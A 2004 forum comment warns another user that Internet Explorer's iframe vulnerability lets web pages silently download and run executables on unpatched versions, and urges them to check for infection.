Nov. 17th, 2004 07:09 am (UTC)
"No, I won't. IE asks me if I would like to install something, and I say no. End of story."

Try it.

The iFrame exploit is an exploit that will cause Explorer to download and run any executable without asking you, even if you have instructed Explorer not to download ActiveX controls (or anything else). All versions of Explorer except the one that ships with XP Service Pack 2 are vulnerable; all will download and run executables without informing the user, regardless of the user's settings.

Many viruses and adware/spyware spread using this or other Explorer vulnerabilities. Are you sure you aren't infected? When was the last time you ran the virus check at housecall.trendmicro.com or ran ad-busting programs? You might just be surprised.